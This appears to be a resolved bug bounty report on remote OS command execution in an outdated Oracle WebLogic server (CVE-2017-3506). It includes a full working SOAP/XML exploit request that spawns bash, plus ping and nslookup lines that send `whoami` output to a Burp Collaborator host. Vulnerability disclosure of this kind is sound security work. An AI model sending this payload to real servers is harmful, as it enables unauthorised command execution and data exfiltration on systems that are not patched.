Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-3506]
Critical
MTN Group
Reported by
tounsi_007
Vulnerability Details
Technical details and impact analysis
## Summary
Hello. I was able to identify an RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`.
## Steps To Reproduce
* To reproduce, try this request with BurpSuite
* This request to `https://raebilling.mtn.co.za/wls-wsat/RegistrationRequesterPortType` will trigger Remote OS Command Execution:
```
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: raebilling.mtn.co.za
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Accept-Languag: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
==**Note:**==
* **To reproduce this case with nslookup or ping, `fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net` host should be replaced by your own Burp Collaborator instance or with your private `VPS IP` to catch the DNS request**
## _**Example:**_
```
ping `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net
nslookup `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net
```
==**POC:**== {F736973}
## Suggested Mitigation/Remediation Actions
* Patching WebLogic to the recent version will fix the issue.
## Impact
**This vulnerability allows an unauthenticated attacker:**
* To perform Remote OS Command Execution
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
OS Command Injection